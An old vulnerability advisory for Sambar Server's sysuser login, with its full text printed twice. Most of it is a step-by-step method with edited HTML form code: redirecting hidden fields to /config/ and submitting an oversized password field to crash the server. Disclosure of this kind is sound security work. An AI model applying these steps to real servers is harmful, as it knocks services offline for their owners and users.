Lorenzo Manuel Hernandez Garcia-Hierro
02/04/03, 06:20
**** THE SAMBAR SERVER BUFFER OVERFLOW IN SYSUSER LOGIN SYSTEM *****
RISK ( by mine) : 7 (1/10)
SYSTES AFFECTED: All Sambar Server systems with sysuser login included.
VULNERABILITIES: 2 KNOWN ( can be more)
DESCRIPTION:
This vulnerability is caused because the form that the Sambar Server
demon doesn't examinates the buffer and sizes of the login form
transfer, the only protection for the server is the values at the form in
the html code ( the max value of the RCPassword input) , this can be a
vulnerability if the server is public-exposed and the directories of the
sysuser is known.
METHOD TO XPLOIT IT:
You must be sure and known the true path (at sambar root like c:\sambar )
of the sysuser login form, now follow this easy steps:
1st: go to the webserver sysuser login form path , like
http://localhost/sysuser/index.stm (you must specify the index.stm for
the RPC called locally trough index.stm ).
2nd: copy and paste the code of the form ( total page ) and paste it in a
blank text field , rename to a something.html .
3th: put in the correct fields the http://localhost or url for your
sambar server installation ,this is for the form and images , of course,
the form must be connect to the correct url address of the server script.
The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login"
onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop
installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more
buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!
*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
4th: now you can try to refresh and login , use a valid user and password
if you want to prove the vulnerability number one or go to the 6th step!
5th: now you must push on the submit button , wait , and if you are
running the server on your computer the server pick up and becomes
unstable , if you continue sending this attemps the server must be
restarted or the computer restarted during the attack!.
6th: the second vulnerability is the bffer overflow in form fields of
password ( you can learn more about this in the advisory of
Allaire 'ColdFusion Buffer OverFlow in form fields') , you can insert
more than million of characters and submit it but you must edit the form
code in your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this
to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than
hundred thousand characters"]
and..........
7th: push on submit and the server pick up too!
SOLUTION:
I don't know a completly solutions because this vulnerability is the
ancient and older type of vulnerability and the only possible solution
is...
- Change the path and directory of the sambar server user files!
- the developers of sambar server can change the code and develop a
module for examine the trafic of user files and buffers of form transfer
in POST or GET mode.
CONTACT:
NAME: Lorenzo Hernandez Garcia-Hierro
MAIL: security@lorenzohgh.com
WEBSITE: www.lorenzohgh.com
RISK ( by mine) : 7 (1/10)
SYSTES AFFECTED: All Sambar Server systems with sysuser login included.
VULNERABILITIES: 2 KNOWN ( can be more)
DESCRIPTION:
This vulnerability is caused because the form that the Sambar Server
demon doesn't examinates the buffer and sizes of the login form
transfer, the only protection for the server is the values at the form in
the html code ( the max value of the RCPassword input) , this can be a
vulnerability if the server is public-exposed and the directories of the
sysuser is known.
METHOD TO XPLOIT IT:
You must be sure and known the true path (at sambar root like c:\sambar )
of the sysuser login form, now follow this easy steps:
1st: go to the webserver sysuser login form path , like
http://localhost/sysuser/index.stm (you must specify the index.stm for
the RPC called locally trough index.stm ).
2nd: copy and paste the code of the form ( total page ) and paste it in a
blank text field , rename to a something.html .
3th: put in the correct fields the http://localhost or url for your
sambar server installation ,this is for the form and images , of course,
the form must be connect to the correct url address of the server script.
The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login"
onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop
installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more
buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!
*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
4th: now you can try to refresh and login , use a valid user and password
if you want to prove the vulnerability number one or go to the 6th step!
5th: now you must push on the submit button , wait , and if you are
running the server on your computer the server pick up and becomes
unstable , if you continue sending this attemps the server must be
restarted or the computer restarted during the attack!.
6th: the second vulnerability is the bffer overflow in form fields of
password ( you can learn more about this in the advisory of
Allaire 'ColdFusion Buffer OverFlow in form fields') , you can insert
more than million of characters and submit it but you must edit the form
code in your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this
to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than
hundred thousand characters"]
and..........
7th: push on submit and the server pick up too!
SOLUTION:
I don't know a completly solutions because this vulnerability is the
ancient and older type of vulnerability and the only possible solution
is...
- Change the path and directory of the sambar server user files!
- the developers of sambar server can change the code and develop a
module for examine the trafic of user files and buffers of form transfer
in POST or GET mode.
CONTACT:
NAME: Lorenzo Hernandez Garcia-Hierro
MAIL: security@lorenzohgh.com
WEBSITE: www.lorenzohgh.com